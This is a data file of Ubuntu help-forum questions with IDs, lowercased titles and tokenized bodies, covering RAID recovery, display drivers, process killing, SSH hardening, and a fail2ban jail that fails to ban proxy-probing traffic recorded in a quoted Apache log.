27478	creating snapshoot gallery from video	anyone know of an application for creating a snapshot gallery from a video file , like this picture ?
27485	accidentally uninstalled ubuntu-desktop and anacron . reinstalled . what can i expect ?	unfortunately when i installed the fcron package to take a look at it , i did n't realize that i was also uninstalling ubuntu desktop and anacron . so , i then did apt-get install anacron ubuntu-desktop , which also removed fcron . however , i need to know what instability issues i may now encounter because i have done this change and changed it back . i mean , now that anacron is back and ubuntu-desktop is back , am i out of the woods ? or , will i lose any important jobs that need to run periodically from anacron ?
27490	nautilus toolbar and status bar theming	i want to change background and font color of nautilus status bar and toolbar . ( i hope the bar where breadcrumbs are is the toolbar . ) i can see editing ~/.gtkrc-2.0 helps in changing sidepane as well as other widgets but ca n't find a proper example .
27493	what are the settings to allow me to access the ubuntu irc from empathy ?	i want to chat with other ubuntu-ers but i 'm lost on how to do this properly . do i have to sign up anywhere ? is there only one ubuntu channel ?
27498	raid md device is not remove from memory , how to overcome this problem	i create raid 10 , i removed two arrays form md11 one by one , after that i going to editing the contents those are mounted ( it will be not responding stage ) , after i try for remove arrays those are left it is shows device or resource busy ( is not removed from memory ) . i try to terminate process this is also not work , i absorve from 4 days resync will be 8.0 % it can not modifying . # cat /proc/mdstat personalities : [ raid1 ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ linear ] [ raid10 ] md11 : active raid10 sde1 [ 3 ] sdj14 286743936 blocks 64k chunks 2 near-copies [ 4/1 ] [ ___u ] [ 1:2:3:0 ] [ = > ... ... ... ... ... ... . ] resync = 8.0 % ( 23210368/286743936 ) finish=289392.6min speed=15k/sec # mdadm -d /dev/md11 /dev/md11 : version : 00.90.03 creation time : sun jan 16 16:20:01 2011 raid level : raid10 array size : 286743936 ( 273.46 gib 293.63 gb ) device size : 143371968 ( 136.73 gib 146.81 gb ) raid devices : 4 total devices : 2 preferred minor : 11 persistence : superblock is persistent update time : sun jan 16 16:56:07 2011 state : active , degraded , resyncing active devices : 1 working devices : 1 failed devices : 1 spare devices : 0 layout : near=2 , far=1 chunk size : 64k rebuild status : 8 % complete uuid : 5e124ea4:79a01181 : dc4110d3 : a48576ea events : 0.23 number major minor raiddevice state 0 0 0 0 removed 1 0 0 1 removed 4 8 145 2 faulty spare rebuilding /dev/sdj1 3 8 65 3 active sync /dev/sde1 # umount /dev/md11 umount : /dev/md11 : not mounted # mdadm -s /dev/md11 mdadm : fail to stop array /dev/md11 : device or resource busy # lsof /dev/md11 command pid user fd type device size node name mount 2128 root 3r blk 9,11 4058 /dev/md11 mount 5018 root 3r blk 9,11 4058 /dev/md11 mdadm 27605 root 3r blk 9,11 4058 /dev/md11 mount 30562 root 3r blk 9,11 4058 /dev/md11 badblocks 30591 root 3r blk 9,11 4058 /dev/md11 # kill -9 2128 # kill -9 5018 # kill -9 27605 # kill -9 30562 # kill -3 30591 # mdadm -s /dev/md11 mdadm : fail to stop array /dev/md11 : device or resource busy # lsof /dev/md11 command pid user fd type device size node name mount 2128 root 3r blk 9,11 4058 /dev/md11 mount 5018 root 3r blk 9,11 4058 /dev/md11 mdadm 27605 root 3r blk 9,11 4058 /dev/md11 mount 30562 root 3r blk 9,11 4058 /dev/md11 badblocks 30591 root 3r blk 9,11 4058 /dev/md11 # cat /proc/mdstat personalities : [ raid1 ] [ raid0 ] [ raid6 ] [ raid5 ] [ raid4 ] [ linear ] [ raid10 ] md11 : active raid10 sde1 [ 3 ] sdj14 286743936 blocks 64k chunks 2 near-copies [ 4/1 ] [ ___u ] [ 1:2:3:0 ] [ = > ... ... ... ... ... ... . ] resync = 8.0 % ( 23210368/286743936 ) finish=289392.6min speed=15k/sec
27501	what 's the difference between 'killall ' and 'pkill ' ?	after using just plain kill < some_pid > on unix systems for many years , i learned pkill from a younger linux-savvy co-worker colleague1 . i soon accepted the linux-way , pgrep-ing and pkill-ing through many days and nights , through slow-downs and race conditions . this was all well and good . but now i see nothing but killall . how-to 's seem to only mention killall , and i 'm not sure if this is some kind of parallel development , or if killall is a successor to pkill , or something else . it seems to function as more targeted pkill , but i 'm sure i 'm missing something . can an ubuntu/debian-savvy2 person explain when ( or why ) killall should be used , especially if it should be used in preference to pkill ( when pkill often seems easier , because i can be sloppier with name matching , at least by default ) . when speaking of killall , i 'm not thinking of the command that on some unix systems ( solaris , aix , ? ) would kill all user processes . here 's a description of that version , from a manpage for ibm 's aix : the killall command cancels all processes that you started , except those producing the killall process . this command provides a convenient means of canceling all processes created by the shell that you control . when started by a root user , the killall command cancels all cancellable processes except those processes that started it . if several signals are specified , only the last one is effective . 1 'colleague ' is free upgrade from 'co-worker ' , so might as well . 2 originally i thought this was a linux or debian thing , but some sources are saying that the linux killall is derived from bsd-flavored unix .
27513	what is the difference between debian contrib & non-free and how it corresponds to ubuntu ?	i have been trying to understand the difference between debian 's contrib and non-free sections . do contrib packages just wrappers around non-free softwares ? like what we have in flashplugin-nonfree in ubuntu ? secondly , is nonfree of debian corresponding to multiverse or restricted or union of both ? i was checking chapter 2 of debian policy manual
27519	can i use easy_install ?	can i use easy_install on ubuntu 10.10 ? if yes , then how ?
27520	xrandr : ca n't add new mode with nvidia driver	i 'm in the same situation as the question `` xrandr : ca n't add new modeâś '' , i ca n't add a new mode because xrandr does not support nvidia binary driver ( blame nvidia yeah i know ) but nvidia-settings can only detect resolutions up to 1024x768 when i try to use lg e2250 which support resolutions up to 1920x1080.. how can i add a new mode to nvidia without using xrandr ? thank you..
27523	why is there no gnome shell package for natty ?	aside from a ppa . is it not currently being worked on , or is there lack of something .
27527	why does n't my nvidia driver support 1280*1024 ?	edit : i think the problem is in the nvidia x server , that does n't support an rgb screen from 1990 . the screen was the best of them all when it was released . this a strange thing ! in windows the edid must work because 1280*1024 is used as max resolution , but in ubuntu those stuff are n't being received , so how do i tell ubuntu/nivida to find those edid stuff ? hi , i have an external monitor which is an 20 '' 1280*1024 . in windows 7 it works fine with that resolution but in ubuntu it ca n't . the screens model name is intellicolor display/20 and the name of the company is `` radius '' .recived well , twin view is working but the only maximum resolution is 1024*768 . i 'm using nividas x server program . if i force it to use 1280*1024 it all crashes and i have to force a reboot . alvar @ alvars-laptop : ~ $ disper -l display dfp-0 : hsd121phw1 resolutions : 320x175 , 320x200 , 360x200 , 320x240 , 400x300 , 416x312 , 512x384 , 640x350 , 576x432 , 640x400 , 680x384 , 720x400 , 640x480 , 720x450 , 640x512 , 700x525 , 800x512 , 840x525 , 800x600 , 960x540 , 832x624 , 1024x768 , 1366x768 display crt-0 : crt-0 resolutions : 320x240 , 400x300 , 512x384 , 680x384 , 640x480 , 800x600 , 1024x768 , 1152x864 , 1360x768
27528	how to display current time & date setting ?	how to display the current time configuration like time zone in ubuntu ?
27531	installing ubuntu by writing on the hard drive	i have a laptop whose cd drive is not operational and is too old to boot from a flash stick . i have bought a new hard drive for it for which i have an enclosure . is there a way to configure the disk as an external to my current ubuntu setup , copy some form of ubuntu on the hard drive , place the hd in the old laptop , and have ubuntu install ubuntu from there ? effectively what i am asking about is some sort of live cd that installs on itself ( since the hd is writeable ) .
27533	unable to use synaptic via launcher	when i open synaptic via launcher on gnome-panel , it opens and asks me for the password but if i enter the password , it says its wrong even though the password is correct and it used to work ok few days ago . if i open synaptic via terminal using sudo synaptic then it opens ok without any problem .
27534	fn key sticks down	just bought my significant other a shiny new samsung q330 13 '' netbook , stuck an ocz agility in it and installed maverick . just as a quick aside , this is a devastating combination . graphics work perfectly and it cold-boots to desktop in about 7 seconds . very quick . but ( common to laptops ) i 've got a couple of problems . i 'll start with the most problematic and start a new thread for the other . like a lot of laptops , there is a fn ( function ) modifier to allow some keys to have another purpose . when i tried to alter the brightness of the screen by tapping fn+down , it worked but kept on going until it was as dim as it could go . i tapped fn+up and it went to the other extreme . after that the entire keyboard ceases to work properly because the fn modifier appears to be locked . additionally , and as a direct side effect , i think , clicking on things does n't result in a standard result . it 's as if control is being held . a reboot is the only thing that seems to fix these problems . this is n't a problem if you do n't touch the fn key but as there are two of them on the keyboard , an accident is going to happen sooner than later , requiring a reboot ( and probably some data loss ) . i do n't have a lot of experience with laptops ( i prefer my hulking great desktop ) so this is n't my area of expertise . i 'm open to all suggestions , even disabling the two fn keys until we can find a better solution .
27537	broadcom sta driver does n't work well with bcm4313	following on from my other question about our new samsung q330 , i 've noticed that the wireless is incredibly flakey . it can connect but after a little use , especially if it does a lot of downloading at once ( read : install something from the software centre ) , the connection stops working . network manager still see the connection , there 's just no network throughput . i 've simple tests like pinging other local network hosts and they just fail . the samsung q330 has a broadcom bcm4313 wifi card ( it 's proper id : 14e4:4727 ) and it 's running on the broadcom sta drivers that jockey suggests ( it did n't work at all without this ) . i did try installing b43-fwcutter but this just did n't do anything . i was expecting a configuration screen to come up ( to select a firmware ) but it never did . this page suggests the newer brcm80211 driver might be able to help , but i do n't know how to install that . if you think this is the right route , please let me know how one goes about installing it .
27541	why ca n't my machine resolve local windows hostnames ?	when i ping any local windows hostname from my ubuntu machine i get `` unable to resolve host '' , but when i ping from a windows machine it works fine . why would this be ? os : ubuntu 10.04 samba & miredo are installed
27544	how to tell the hotplug system which ntfs driver to use ?	i need a ntfs-3g version later than the one shipped with lucid lynx because i want to make use of the new hide_hid_files and hide_dot_files mount options , which are not present before version 2010.8.8 . ever since i compiled and installed the latest version of ntfs-3g via checkinstall , whenever i plugin a ntfs mass storage device , ubuntu chooses the ntfs kernel module upon the ntfs-3g fuse driver to mount it . i do n't know how to tell my system to use the 3g driver . mount -t ntfs-3g and fstab entries work just fine .
27547	screen shivers on a fresh install	i have just installed ubuntu 10.10 and after the installation when i logged in it shivers from edges on high resolution , and if i set the resolution to 800x600 it stops shivering , what 's the problem ? my board is intel dgc101 and it has a built in ati radeon xpress 200 card . what should i do ?
27557	syncing cell phone with banshee via bluetooth	is it possible that if i connect my cell phone via bluetooth with my laptop it appears like a mp3-player in banshee so i can sync podcasts easily ?
27559	how do i disable remote ssh login as root from a server ?	for security purposes my company wants me to not allow anyone to be able to log into our ubuntu server as root remotely over ssh . we still want the root account to exist , we just do not want it to be able to be logged into remotely . how would i accomplish this ? thank you very much in advance for your time .
27562	make public webcam . which protocol , which codec . ( using vlc )	i want to use my old ( 1ghz ) pc as webcam video stream server ( like you can see those road cameras ) . i thought of using vlc and already tried using http output but it was not really good . too cpu hungry , too big stream ( kbps ) , not stable ... i been reading vlc how-to 's but thre is still a question . which output should i use ? http , rtsp , udp ? i want to make for more than one computer at the same time ( multicast ) . which codec should be good ? pc is not so fast so it should n't be too cpu hungry codec . mpeg2 , mpeg4 , xvid ? how much video buffer should i use ( vb= ? ) ? what about setting ip and ports ? so i need some help with ideas , but if someone can make a vlc command line it 's even better : ) oh , computer has direct internet connection and own ip .
27563	how to install jdk1.6 in ubuntu	hi all , recently i installed ubuntu in virual box inside the a windows os , but i 'm unable to install the jdk in that ubuntu , can any one help me out ?
27568	how to change/create password keyring	when i try to remote desktop to the server from another ubuntu machine using the remote desktop viewer , it asks me to enter the password , which i do , then the viewer pane just goes black . when i come back and look at my server it is saying that the password keyring no longer matches the password used to login to the machine please reenter the password ... and when i type in the password it doesnt take it , it just keeps popping back up saying the same message over and over . i found a thread explaining to go to system -- > preferences -- > passwords & encryptions and right click on the keyring and click set as default . i did that and the problem persists ... i tried changing the password but it told me that my original password was incorrect ( even though it is the password i use to login and provide root authentication when asked ) so i deleted the keyring in hopes of adding a new one but there is no place in gui to add a new one ... so can i add a new one through command line ? if so - how ?
27573	how can i make maximus and metacity compositing coexist ?	i use maximus to undecorate windows , using the top gnome panel to house the window buttons and globalmenu apps . the metacity `` compositing manager '' option must be turned off , otherwise every panel disappears each time i close a window . any help appreciated .
27574	how can i split a mp3 file ?	i have a big mp3 file , it comes from ripping a full cd . i would like to split it into one file per song . it will be great if it can split the file automatically , detecting the start and the end of each song . extra background : i have tried mp3splt and audacity . the first one fails to autodetect the songs and audacity seems to be unable to do it . i would like to burn the songs to a cd ( mp3 format ) to play then in my car radio . it will not support any fancy stuff , it does n't even have an usb connector .
27576	how to make a hotkey for a series of keyboard commands ?	i would like to be able to do ctrl + s , alt + tab and f5 while only pressing alt+shift+s
27578	in gimp can i change all black pixels in a picture to blue pixels ?	using gimp can i make all the black pixels with rgb ( 0,0,0 ) into blue pixels with rgb ( 0,0,255 ) ?
27581	how to make hibernation work on shuttle sx58h7 ( intel x58 express ) ?	i have a shuttle sx58h7 computer ( intel x58 express board , ami bios version 08.00.16 ) with intel core i7 950 and geforce gt 210 silent ( nvidia proprietary driver ) . under karmic ( 64-bit ) , hibernation worked fine . under maverick , the computer goes to hibernation but when woken , usb and display do n't come back and sshd does n't respond , either . sometimes when waking from basic sleep ( as opposed to hibernation ) , sshd does come back and the computer can be reached from the network . iirc , the regression happened when upgrading to lucid . is there a know workaround that would restore the hibernation capability that existed under karmic ?
27585	will compizconfig settings manager be included in natty ?	since unity has to be configured from within compizconfig settings manager , will it be included in natty ?
27588	sound menu album art is not rounded	my album art on my sonud menu ( maverick ) is n't being rounded . is there a solution ?
27592	high load ( and high temp ) with idle processes	i 've got a semi-old laptop ( toshiba satellite a110-228 ) , that 's appointed 'laptop for the kids ' by my sister . i 've installed ubuntu netbook ( 10.10 ) on it because of the lack-of memory and it seems to work fine , accept from some heat-issues . these where never a problem under windows . it looks like i 've got something similar to this problem : load is generally 1 or higher , sometimes its stuck at 0.80 , but its way to high . top/htop only show a couple of percentage cpu use ( which is n't too shocking , as i 'm not doing anything ) . at this point all the software is stock , and i 'd like to keep it that way because its supposed to be the easy-to-maintain kids computer . now i 'd like to find out : what could be the cause of the high load ? could it be as this thread implies , some driver , are there other options to check ? how could i see what is really keeping the system hot and bothered ? how to check what runs , etc etc ? i 'd like to pinpoint the culprint . further steps to take for debugging ? the big bad internet leads me to believe that it might be the graphics drivers . the laptop has an intel 945m chipset , but that does n't seem to be one of the problem childs in this manner ( i read a lot abotu ati drivers that need special isntall ) . i 'd not only welcome hints to directly solve this ( duh ) but also help in starting to debug what is going on . i am really hesitant in installing an older kernel , as i want it to be stock , and easy upgradeable ( because i do n't live near it , it should run without me ; ) ) as an afterthought : to keep the whole thing cooler , can i 'amp up ' the fancontrol ? its only going `` airplane '' mode when the computer is 95 celcius , which is a tad late for my taste . top : powertop :
27596	when the pop up menu automatically appears and i press `ctrl + s` . it pastes ` : w` ?	i 'm using an auto completion pop up script . when i place the cursor left : ( here ) 218px ! important ; or left : ( here ) 218px ! important ; the pop up menu automatically appears as usual , then i press ctrl + s and it pastes : w. i think it is trying to complete : for : w. any suggestions to fix this ? i have this in my vimrc : '' use ctrl-s for saving , also in insert mode noremap < c-s > : w < cr > vnoremap < c-s > < c-c > : w < cr > imap < c-s > < c-o > : w < cr >
27598	list of fonts containing selected character	on mac os x , the character viewer ( equivalent to character map on ubuntu ) has a feature where , when looking at a certain character , it can show a list of all fonts that contain that character . is there something equivalent on ubuntu ? the use case is that , for instance , i could click on a kannada character and see all fonts that cover that character ( and presumably , the rest of the kannada language range ) . edit : just for an idea of what i mean , here 's a screenshot of character viewer on mac os x 10.6 . the `` containing selected character '' is near the bottom of the screen . i seem to remember that this part of the interface was better in 10.5 or 10.4 , actually .
27601	what are fail2ban 's log iptables `` returned nnn '' entries ? ( fail2ban is failing to ban )	in my fail2ban.log there are some entries the meaning of which i do n't understand ( and have n't found searching around ) ... i have several `` jails '' , and i have created one particular one that bans ip 's when they try to connect to web server searching for scripts , i guess ... . these are some entries from a given ip ( sorry about the long log ) : user @ computer : /var/log $ cat apache2/access.log.1 |grep 58.218.199.147 58.218.199.147 - - [ 27/mar/2011:09:03:37 +0200 ] `` get http : //www.mtajp.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 27/mar/2011:11:32:16 +0200 ] `` get http : //ppcfinder.net/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 27/mar/2011:11:34:57 +0200 ] `` get http : //98.126.15.13/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 27/mar/2011:14:04:08 +0200 ] `` get http : //58.218.199.147:7182/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 27/mar/2011:19:02:37 +0200 ] `` get http : //www.shopsline.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 27/mar/2011:21:33:17 +0200 ] `` get http : //98.126.64.106/judge123.php http/1.1 '' 404 435 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 28/mar/2011:14:59:49 +0200 ] `` get http : //www.racross.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 28/mar/2011:17:28:32 +0200 ] `` get http : //98.126.64.106/judge123.php http/1.1 '' 404 435 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:00:58:17 +0200 ] `` get http : //www.racross.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:05:00:53 +0200 ] `` get http : //www.mtajp.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:09:57:48 +0200 ] `` get http : //www.shopsline.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:12:40:06 +0200 ] `` get http : //www.mtajp.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:15:01:01 +0200 ] `` get http : //www.infodownload.info/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.204.110 - - [ 29/mar/2011:15:28:42 +0200 ] `` get http : //58.218.199.147:7182/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:20:01:14 +0200 ] `` get http : //www.cjpjp.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 29/mar/2011:22:31:50 +0200 ] `` get http : //www.travelimgusa.com/ip.php http/1.1 '' 404 429 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 30/mar/2011:01:00:05 +0200 ] `` get http : //98.126.15.13/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 30/mar/2011:03:31:05 +0200 ] `` get http : //www.infodownload.info/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 30/mar/2011:11:02:43 +0200 ] `` get http : //piceducation.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 30/mar/2011:13:33:24 +0200 ] `` get http : //ppcfinder.net/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 30/mar/2011:16:01:04 +0200 ] `` get http : //www.shopsline.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 30/mar/2011:21:04:31 +0200 ] `` get http : //www.racross.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 31/mar/2011:04:35:55 +0200 ] `` get http : //www.racross.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 31/mar/2011:12:03:43 +0200 ] `` get http : //www.mtajp.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 31/mar/2011:14:34:40 +0200 ] `` get http : //www.eduju.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 31/mar/2011:19:36:04 +0200 ] `` get http : //58.218.204.110:7182/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 31/mar/2011:22:05:48 +0200 ] `` get http : //ppcfinder.net/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:03:11:14 +0200 ] `` get http : //58.218.199.147:7182/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:09:52:09 +0200 ] `` get http : //www.travelimgusa.com/ip.php http/1.1 '' 404 429 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:12:15:59 +0200 ] `` get http : //www.racross.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:14:39:47 +0200 ] `` get http : //piceducation.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:17:06:09 +0200 ] `` get http : //www.shopsline.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:20:45:50 +0200 ] `` get http : //www.cjpjp.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 01/apr/2011:23:11:21 +0200 ] `` get http : //www.seektwo.com/proxy-1.php http/1.1 '' 404 434 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 02/apr/2011:01:37:16 +0200 ] `` get http : //www.infodownload.info/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 02/apr/2011:10:25:15 +0200 ] `` get http : //98.126.64.106/judge123.php http/1.1 '' 404 435 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 02/apr/2011:12:51:45 +0200 ] `` get http : //58.218.204.110:7182/judge.php http/1.1 '' 404 432 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 02/apr/2011:15:18:07 +0200 ] `` get http : //www.racross.com/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 02/apr/2011:17:43:43 +0200 ] `` get http : //www.travelimgusa.com/ip.php http/1.1 '' 404 429 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' 58.218.199.147 - - [ 02/apr/2011:22:35:49 +0200 ] `` get http : //www.infodownload.info/proxyheader.php http/1.1 '' 404 438 `` - '' `` mozilla/4.0 ( compatible ; msie 6.0 ; windows nt 5.1 ) '' to prevent this , i have set up a custom jail in /etc/fail2ban/jail.local : [ apache-404-slowattackers ] enabled = true port = http , https filter = apache-404-slowattackers logpath = /var/log/apache*/*access.log bantime = 344000 findtime = 172800 maxretry = 12 and this is /etc/fail2ban/filter.d/apache-404-slowattackers.conf [ definition ] failregex = ( ? p < host > [ 0-9 ] { 1,3 } \. [ 0-9 ] { 1,3 } \. [ 0-9 ] { 1,3 } \ . [ 0-9 ] { 1,3 } ) .+ 404 [ 0-9 ] + `` ignoreregex = ( same as the default /etc/fail2ban/filter.d/apache-404.conf filter ) fail2ban does ban some ip 's when they work against some filters , but not against my custom one . some lines from /var/log/fail2ban.log : 2011-03-31 20:46:29,982 fail2ban.jail : info jail 'apache-404 ' started [ ... ] 2011-03-31 20:46:30,922 fail2ban.jail : info jail 'courierauth ' started 2011-03-31 20:46:31,026 fail2ban.jail : info jail 'apache-404-slowattackers ' started 2011-03-31 20:46:31,038 fail2ban.actions.action : error iptables -n fail2ban-apache-404-slowattackers iptables -a fail2ban-apache-404-slowattackers -j return iptables -i input -p tcp -m multiport -- dports http , https -j fail2ban-apache-404-slowattackers returned 200 2011-04-01 21:39:16,558 fail2ban.actions : warning [ apache-404 ] ban 211.75.185.152 2011-04-01 22:09:17,245 fail2ban.actions : warning [ apache-404 ] unban 211.75.185.152 2011-04-02 15:18:08,544 fail2ban.actions : warning [ apache-404-slowattackers ] ban 58.218.199.147 2011-04-02 15:18:08,684 fail2ban.actions.action : error iptables -n -l input | grep -q fail2ban-apache-404-slowattackers returned 100 2011-04-02 15:18:08,685 fail2ban.actions.action : error invariant check failed . trying to restore a sane environment 2011-04-02 15:18:08,698 fail2ban.actions.action : error iptables -d input -p tcp -m multiport -- dports http , https -j fail2ban-apache-404-slowattackers iptables -f fail2ban-apache-404-slowattackers iptables -x fail2ban-apache-404-slowattackers returned 200 2011-04-02 15:18:08,712 fail2ban.actions.action : error iptables -n fail2ban-apache-404-slowattackers iptables -a fail2ban-apache-404-slowattackers -j return iptables -i input -p tcp -m multiport -- dports http , https -j fail2ban-apache-404-slowattackers returned 200 2011-04-02 15:18:08,721 fail2ban.actions.action : error iptables -n -l input | grep -q fail2ban-apache-404-slowattackers returned 100 2011-04-02 15:18:08,722 fail2ban.actions.action : critical unable to restore environment 2011-04-02 23:20:50,480 fail2ban.actions : warning [ courierauth ] ban 84.225.81.193 2011-04-02 23:50:50,777 fail2ban.actions : warning [ courierauth ] unban 84.225.81.193 2011-04-03 03:23:58,876 fail2ban.actions : warning [ courierauth ] ban 74.143.34.38 2011-04-03 03:53:59,155 fail2ban.actions : warning [ courierauth ] unban 74.143.34.38 as you can see , something fails when trying to ban an attack against my custom filter ( so such attacks are detected , but not correctly banned , i do n't know why ) so my questions would be : are those errors a fail2ban problem or an iptables one ? what do those errors mean ? ... and ... how can they be avoided ? what am i doing wrong , or how could i correct this behaviour ? edit : maybe this is useful to answer the question ( or not ) , but iptables -l shows no trace of my apache-404-slowattackers , while other jails are present : user @ computer : ~ $ sudo iptables -l chain input ( policy accept ) target prot opt source destination fail2ban-courierauth tcp -- anywhere anywhere multiport dports smtp , ssmtp , imap2 , imap3 , imaps , pop3 , pop3s fail2ban-apache tcp -- anywhere anywhere multiport dports www , https fail2ban-sasl tcp -- anywhere anywhere multiport dports smtp , ssmtp , imap2 , imap3 , imaps , pop3 , pop3s fail2ban-postfix tcp -- anywhere anywhere multiport dports smtp , ssmtp fail2ban-ssh tcp -- anywhere anywhere multiport dports ssh fail2ban-couriersmtp tcp -- anywhere anywhere multiport dports smtp , ssmtp fail2ban-apache-overflows tcp -- anywhere anywhere multiport dports www , https fail2ban-apache-multiport tcp -- anywhere anywhere multiport dports www , https fail2ban-ssh-ddos tcp -- anywhere anywhere multiport dports ssh fail2ban-apache-404 tcp -- anywhere anywhere multiport dports www , https fail2ban-pam-generic tcp -- anywhere anywhere fail2ban-apache-noscript tcp -- anywhere anywhere multiport dports www , https chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination chain fail2ban-apache ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-apache-404 ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-apache-multiport ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-apache-noscript ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-apache-overflows ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-courierauth ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-couriersmtp ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-pam-generic ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-postfix ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-sasl ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-ssh ( 1 references ) target prot opt source destination return all -- anywhere anywhere chain fail2ban-ssh-ddos ( 1 references ) target prot opt source destination return all -- anywhere anywhere does this give any further clue ?
